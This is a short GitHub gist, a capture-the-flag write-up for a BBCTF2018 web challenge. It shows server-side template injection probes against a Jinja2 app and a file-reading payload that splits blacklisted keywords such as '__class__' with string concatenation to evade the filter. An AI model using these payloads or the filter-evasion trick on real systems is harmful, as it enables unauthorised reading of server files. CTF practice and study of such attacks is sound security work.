Skip to content

Instantly share code, notes, and snippets.

@aadityapurani aadityapurani/
Last active Apr 8, 2018

What would you like to do?
hard_to_hack (web 400) - BBCTF2018

Hard_To_Hack (Web 400) - BBCTF2018

Test Condition: {{'7'*7}} Config : {{config}} Request not blocked : {{request}}

After successive tries, figured out class keyword was blacklisted and so did many important keywords. But we can use + to concat two strings and use it.

General file reading payload for Jinja2 is {{ ''.__class__.__mro__[2].__subclasses__()[40]('flag', 'r').read() }}

But some keywords were blocked. So split and profit

{{''['__cla'+'ss__']['__mr'+'o__'][2]['__subcla'+'sses__']()[40]('fl'+'ag', 'r').read()}}

This acts same as the above payload due to the property access (

Hence, you send it after URL encoding


Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.